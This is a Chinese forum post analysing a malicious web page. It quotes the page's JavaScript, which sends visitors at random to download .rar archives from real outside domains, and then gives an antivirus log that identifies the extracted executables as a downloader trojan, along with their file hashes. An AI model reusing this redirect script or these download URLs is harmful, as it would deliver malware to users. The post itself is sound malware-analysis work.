本帖最后由 Flying_Bird 于 2015-9-30 21:54 编辑
[mw_shl_code=html,true]
<html><head><script type="text/javascript" charset="utf-8">
var urla="http://www.kan258.com/gx.rar";
var urlb="http://www.kan258.com/gs.rar";
var urlc="http://www.kan258.com/gk.rar";
var urld="http://www.kan258.com/gg.rar";
var urle="http://www.7klm.com/wm.php";
var i = parseInt(Math.random()*10);
if(i == 0){
window.location.href=urla;
}else if(i == 1){
window.location.href=urlb;
}else if(i == 2){
window.location.href=urlb;
}else if(i == 3){
window.location.href=urlb;
}else if(i == 4){
window.location.href=urlc;
}else if(i == 5){
window.location.href=urlc;
}else if(i == 6){
window.location.href=urla;
}else if(i == 7){
window.location.href=urlb;
}else if(i == 8){
window.location.href=urla;
}else if(i == 9){
window.location.href=urla;
}
</script></head></html>[/mw_shl_code]
点击链接可以随机下载到gs.rar, gk.rar, gx.rar,而urld和urle是冗余的。
[mw_shl_code=xml,true]正在扫描日志
病毒库版本: 12334 (20150930)
日期: 2015/9/30 时间: 21:44:47
已扫描的磁盘、文件夹和文件: \gx;\gk;\gs
\gx\MM-liao9786.exe - Win32/Downloader.Agent.AL 潜在的不受欢迎应用程序 的变种
\gs\MM-liao9723.exe - Win32/Downloader.Agent.AL 潜在的不受欢迎应用程序 的变种
已扫描的对象数: 17
发现的威胁数: 2
已清除对象数: 0
完成时间: 21:44:47 总扫描时间: 0 秒 (00:00:00)[/mw_shl_code]
另外gs和gx是一样的。
[mw_shl_code=xml,true]文件: \gs\MM-liao9723.exe
大小: 917568 字节
文件版本: 1, 0, 0, 1
修改时间: 2015年9月9日, 11:28:01
MD5: 26C9871FE8541E68DF2B412884FDD3E4
SHA1: A32539B372E076345E7AC421F735A290EC08EA04
CRC32: 8D81C2AB
文件: \gx\MM-liao9786.exe
大小: 917568 字节
文件版本: 1, 0, 0, 1
修改时间: 2015年9月9日, 11:23:37
MD5: 26C9871FE8541E68DF2B412884FDD3E4
SHA1: A32539B372E076345E7AC421F735A290EC08EA04
CRC32: 8D81C2AB
文件: \gk\lingxiu_68_10644_pure.exe
大小: 446760 字节
文件版本: 1.0.0.1
修改时间: 2015年8月30日, 11:33:18
MD5: 73BF03DC78F196855E9B228A4ACA3E13
SHA1: 433343FC5E6C56BF8803DA501907660B4E6E7FED
CRC32: 97AE776D[/mw_shl_code] |
楼主: 水墨静音
发表于 2015-9-30 19:26:01
